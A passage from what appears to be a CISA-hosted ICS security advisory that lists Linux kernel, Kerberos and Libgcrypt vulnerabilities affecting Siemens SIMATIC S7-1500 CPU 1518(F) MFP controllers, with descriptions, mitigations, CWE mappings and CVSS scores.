<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/805.html">CWE-805 Buffer Access with Incorrect Length Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31761</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: iio: gyro: mpu3050: Move iio_device_register() to correct location iio_device_register() should be at the end of the probe function to prevent race conditions. Place iio_device_register() at the end of the probe function and place iio_device_unregister() accordingly.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31761">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/367.html">CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31768</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: iio: adc: ti-adc161s626: use DMA-safe memory for spi_read() Add a DMA-safe buffer and use it for spi_read() instead of a stack memory. All SPI buffers must be DMA-safe. Since we only need up to 3 bytes, we just use a u8[] instead of __be16 and __be32 and change the conversion functions appropriately.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31768">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-40355</a></h3>
<div class="csaf-accordion-content">
<p>In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-40355">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-41989</a></h3>
<div class="csaf-accordion-content">
<p>Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-41989">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43011</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/x25: Fix potential double free of skb When alloc_skb fails in x25_queue_rx_frame it calls kfree_skb(skb) at line 48 and returns 1 (error). This error propagates back through the call chain: x25_queue_rx_frame returns 1 | v x25_state3_machine receives the return value 1 and takes the else branch at line 278, setting queued=0 and returning 0 | v x25_process_rx_frame returns queued=0 | v x25_backlog_rcv at line 452 sees queued=0 and calls kfree_skb(skb) again This would free the same skb twice. Looking at x25_backlog_rcv: net/x25/x25_in.c:x25_backlog_rcv() { ... queued = x25_process_rx_frame(sk, skb); ... if (!queued) kfree_skb(skb); }</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43011">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43024</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: reject immediate NF_QUEUE verdict nft_queue is always used from userspace nftables to deliver the NF_QUEUE verdict. Immediately emitting an NF_QUEUE verdict is never used by the userspace nft tools, so reject immediate NF_QUEUE verdicts. The arp family does not provide queue support, but such an immediate verdict is still reachable. Globally reject NF_QUEUE immediate verdicts to address this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43024">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/115.html">CWE-115 Misinterpretation of Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43025</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: ignore explicit helper on new expectations Use the existing master conntrack helper, anything else is not really supported and it just makes validation more complicated, so just ignore what helper userspace suggests for this expectation. This was uncovered when validating CTA_EXPECT_CLASS via different helper provided by userspace than the existing master conntrack helper: BUG: KASAN: slab-out-of-bounds in nf_ct_expect_related_report+0x2479/0x27c0 Read of size 4 at addr ffff8880043fe408 by task poc/102 Call Trace: nf_ct_expect_related_report+0x2479/0x27c0 ctnetlink_create_expect+0x22b/0x3b0 ctnetlink_new_expect+0x4bd/0x5c0 nfnetlink_rcv_msg+0x67a/0x950 netlink_rcv_skb+0x120/0x350 Allowing to read kernel memory bytes off the expectation boundary. CTA_EXPECT_HELP_NAME is still used to offer the helper name to userspace via netlink dump.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43025">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43026</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: zero expect NAT fields when CTA_EXPECT_NAT absent ctnetlink_alloc_expect() allocates expectations from a non-zeroing slab cache via nf_ct_expect_alloc(). When CTA_EXPECT_NAT is not present in the netlink message, saved_addr and saved_proto are never initialized. Stale data from a previous slab occupant can then be dumped to userspace by ctnetlink_exp_dump_expect(), which checks these fields to decide whether to emit CTA_EXPECT_NAT. The safe sibling nf_ct_expect_init(), used by the packet path, explicitly zeroes these fields. Zero saved_addr, saved_proto and dir in the else branch, guarded by IS_ENABLED(CONFIG_NF_NAT) since these fields only exist when NAT is enabled. Confirmed by priming the expect slab with NAT-bearing expectations, freeing them, creating a new expectation without CTA_EXPECT_NAT, and observing that the ctnetlink dump emits a spurious CTA_EXPECT_NAT containing stale data from the prior allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43027</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_helper: pass helper to expect cleanup nf_conntrack_helper_unregister() calls nf_ct_expect_iterate_destroy() to remove expectations belonging to the helper being unregistered. However, it passes NULL instead of the helper pointer as the data argument, so expect_iter_me() never matches any expectation and all of them survive the cleanup. After unregister returns, nfnl_cthelper_del() frees the helper object immediately. Subsequent expectation dumps or packet-driven init_conntrack() calls then dereference the freed exp-&gt;helper, causing a use-after-free. Pass the actual helper pointer so expectations referencing it are properly destroyed before the helper object is freed. BUG: KASAN: slab-use-after-free in string+0x38f/0x430 Read of size 1 at addr ffff888003b14d20 by task poc/103 Call Trace: string+0x38f/0x430 vsnprintf+0x3cc/0x1170 seq_printf+0x17a/0x240 exp_seq_show+0x2e5/0x560 seq_read_iter+0x419/0x1280 proc_reg_read+0x1ac/0x270 vfs_read+0x179/0x930 ksys_read+0xef/0x1c0 Freed by task 103: The buggy address is located 32 bytes inside of freed 192-byte region [ffff888003b14d00, ffff888003b14dc0)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43027">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/459.html">CWE-459 Incomplete Cleanup</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43028</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: x_tables: ensure names are nul-terminated Reject names that lack a \0 character before feeding them to functions that expect c-strings. Fixes tag is the most recent commit that needs this change.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43028">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/170.html">CWE-170 Improper Null Termination</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43030</a></h3>
<div class="csaf-accordion-content">
